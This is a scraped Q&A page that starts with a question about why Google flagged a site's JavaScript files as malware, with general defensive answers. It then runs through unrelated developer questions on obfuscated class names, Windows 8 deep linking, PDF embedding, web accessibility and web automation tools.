when google mark a file as malware? - malware

I have couple of Js files including jQuery in my website.
Google says:
The last time Google tested a site on this network was on 2013-02-14, and the last time suspicious content was found was on 2013-02-14.
Do you have any idea in what conditions Google may detect malware in Js files? Problem with code or malware in file?

Sorry for the vague answer, but without more details I can't be more specific. In general there are certain patterns and code techniques that are commonly used by malware to overflow buffers in browsers, thus giving the attacker control of the system. The Javascript itself is just used as a conduit to the browser. Often, Shellcode bytes are encoded into javascript for delivery to an unsuspecting user's browser. If you have encoded data being delivered through Javascript, it may appear as suspicious to Google's heuristics engine.
It is also possible that you are using similar techniques to poisonous scripts (sometimes used for Cross-site scripting (XSS) and Cross-site request forgery (CSRF)) to accomplish some of your work, and this is a good way to get flagged by Google.
Another possibility is that your website code is fine, but it has a security hole that causes Google concern because a malicious user can exploit your site. To determine this I recommend using a web scanner such as Nikto, Burp Suite (my personal favorite), Acunetix, etc. to try and find security holes.
You can also find a lot of great info at OWASP
I hope this helps, as having your site flagged by Google can cause a lot of frustration and anxiety. Good luck!

If Google says they found malicious (or suspicious) code in your files, there is malicious or suspicious code in your files.
Sorry but, Google doesn't scan for vulnerabilities - only bad code already existing on your site. Without knowing more about your website, operating system, software, etc. it's impossible to give you more information on how it happened.
If they detected it in your .js files, you may have a document.write statement either at the very beginning or the very end of those files. The problem for you is that even if you find and remove the infectious code, you still don't know how it happened. Without knowing that and taking steps to prevent it, it will return.

Related

Why does Google obscure HTML/CSS classes on Google+?

The attachment is a screenshot of Chrome Developer Tools when looking at Google+ HTML. Note the ~random classnames:
The source for unreadable identifiers can be:
minification
obfuscation
random Id generation
Google Plus is probably implemented as a GWT (or similar framework) application with minified resources (javascript and css files) and automatically generated identifiers. Minification is also widely used as a tool for obfuscating the code so the unreadability is partly intentional too.
Obfuscation can be used to reduce code size, as well as reduce code readability for an "unauthorized" user to make it harder to reverse-engineer a product/program or steal ideas. Someone asked a pretty similar question here, that should answer any more questions that you have.

Share a "deep link" from a Windows 8/WinRT application

I have searched using many different terms and phrases, and waded through many pages of results, but I have (remarkably) not seen anyone else addressing, even asking, about, this issue. So here goes...
Ultimate Goal: Allow a user viewing a content-based page (may contain both text and images) within a Windows Store app to share that content with someone else.
Description
I am working on taking a fair amount of content and making it available for browsing/navigating as a Windows 8/WinRT/Windows Store (we need a consistent name here) application. One of the desired features is to take advantage of the Share Charm, such that someone viewing a page could share that page with someone else.
The ideal behavior is for the application to implement the Share Source contract which would share an email message that contained some explanatory text, a link to get the app from the Windows Store, and a "deep link" into the shared page in the application.
Solutions Considered
We had originally looked at just generating a PDF representation of the page, but there are very few external libraries that would work under WinRT, and having to include externally licensed code would be problematic as well. Writing our own PDF generation code would out of scope.
We have also considered generating a Word document or PowerPoint slide using OpenXML, but again, we run up against the limitaions of WinRT. In this case, it is highly unlikely the OpenXML SDK is useable in a WinRT application.
Another thought was to pre-generate all of the pages as .pdf files, store them as resources, and when the Share Charm is invoked, share the .pdf file associated with the current page. The problem here is the application will have at least 150 content pages, and depending on how we break the content down, up to over 600. This would likely cause serious bloat.
Where We Are At
Thus we have come to sharing URIs. From what I can tell, though, the "deep linking" feature is only intended for use on Secondary Tiles tied to your application. Another avenue I considered was registering a protocol like, "my-special-app:" with the OS and having it fire up the application but that would require HKCR registry access, which is outside the WinRT sandbox.
If it matters, we are leaning towards an HTML/JS application, rather than XAML/C#, because the converted content will all be in HTML and the WebView control in WinRT is fairly limited. This decision is not yet final, though.
Conclusion
So, is this possible, and if so, how would it be done or where can I find documentation on it?
Thanks,
Dave Parker

Embedding PDF on website - without uploading to other service

On our site we use Google's document viewer to let users view PDF and other documents in the browser. But Google's viewer is not very good, when used without being Google. Quite often it doesn't show anything, and the limit for the PDF file is around 10/20mb. The main issue is that it quite often just doesn't show any files.
So, we're looking for a way to show pdf (and other documents) on our site. It would be great if it could be done without us having to upload it to another service as this complicates the process.
The pricing is not an issue, so even if you know an expensive service, it would be great to let us know.
Or if anyone has other solutions then it would be great to hear of that too.
Thanks,
Tobias
Through another source we were suggested to use Scribd, and our first tests shows that it works great. The documentation is good-ish so it's easy enough to set up.

How does Javascript use affect 508 Compliance?

As background, I currently develop for a university, and we have problems with departments demanding "web 2.0 content" and accessibility requirements.
How do really big sites that are JavaScript based deal with 508 Compliance? Some sites degrade, and others require enabling JavaScript. How much impact does one decision have versus the other?
Also, in a realistic sense, how much development time should be devoted the accessible versions of sites versus the "main" versions?
I'm a blind developer and find it possible to use many Web 2.0 sites - this is most certainly possible.
Firstly, I strongly advise against making a separae accessible site, regardless of how many people advise you to do this. This is bad practice and will end up being more work, even if it initialy seems simpler.
Next, try to use progressive enhancement (particularly if this is a new site). Code the site without any Javascript; it's not just accessibility which benefits. Then, in your OnLoad() go through and attach Click events to the anchor tags; this way if you have Javascript you'll see the Ajax version, otherwise you will have a full page refresh and see another HTML page.
Luckily, there is a new standard, WAI-Aria (www.w3.org/WAI/intro/aria.php) which makes this much simpler. You attach attributes to HTML tags to identify the semantics of an Ajax control, for example. The only problem with Aria is that it only works with newer screen readers and web browsers. The university may well require the site be accessible to people running older software.
I'm a screen reader user and often use Javascript enabled sites. Javascript is not an accessibility issue, the way it is used can be. For example if the site uses javascript that requires the use of a mouse and doesn't have keyboard alternatives it will not be 508 compliant. An example of a site that uses Javascript and is accessible is stackoverflow.com. The only feature that isn't accessible is the ability to determine if you have accepted an answer to a question. I would take a look at the links in Annie's answer. All the blind college students I know use a fairly modern browser with Javascript enabled, Lynx is no longer popular in the blind community. If you want to try using a screen reader a good open source one for windows can be found at
http://www.nvda-project.org/
and it works well with firefox. If you want to try using the web with out Javascript install the Noscript addin.
Sites don't have to disable JavaScript to be accessible. Many sites use ARIA roles to work better with screen readers. There's a giant list of articles on accessible AJAX applications here. You could try something like AxsJAX.

Is there an equivalent of Don Libes's *expect* tool for scripting interaction with web pages?

In the bad old days of interactive console applications, Don Libes created a tool called Expect, which enabled you to write Tcl scripts that interacted with these applications, much as a user would. Expect had two tremendous benefits:
It was possible to script interactions that otherwise would have had to be repeated by hand, tediously. A classic example was dialup Internet access hell (from the days before PPP).
It was possible to write scripts to test one's own interactive applications, programmatically, as part of a regression suite.
Today most interactive applications are on the web, not on the console. Hence my question: is there any tool that provides the ability to interact with web pages and web forms programmatically, much as Expect provides the ability to interact with console applications programmatically?
(The closest thing I am aware of is Chickenfoot.)
You might be looking for Selenium
I've used Selenium RC in conjunction with Python to drive web page interactions programmatically. This has allowed me to write pretty extensive user tests in which forms and inputs are driven and their results are measured.
Check out the Selenium IDE on Firefox (as mentioned above). It allows you to record tests in the browser and play them back, either using the IDE itself, or the Remote Control app.
Perl Mechanize works pretty well for this exact issue.
HTTPS and some authentication issues are tricky at times. I will be posting couple questions about those in the future.
I did a ton of Expect work in a former life and always thought Don Libes' Expect book was one of the best-written and most enlightening technical books I'd ever seen.
Hands down I would say that Perl's WWW::Mechanize library is what you want. I note above that you were having trouble finding documentation. There is good documentation for it! Look up the module's distribution on search.cpan.org and see what all is packaged with it. There's a FAQ, Cookbook with examples, etc. Plus I've always been able to get help on the web. If you can't get it here, try at use.perl.org or perlmonks.org. WWW::Mechanize's author, Andy Lester, is present on Stack Overflow. (He's also an all around friendly and helpful guy.)
I believe WWW::Mechanize also has a program that is analogous to Expect's autoexpect program: you set up a proxy process running this program as a server, point your browser to it as a proxy, perform the actions you want to automate, and then the proxy program gives you a WWW::Mechanize program for you to use as a base for your project. (If it works like autoexpect, you will certainly want to make modifications from there.)
As mentioned above, WWW::Mechanize is a browser (to be more exact, it is a web client or http client) that happens to be programmable. The last time I looked, there was even work in progress to make it support JavaScript.
In addition to Selenium, if you're doing the Ruby/Rails thing, there's Webrat.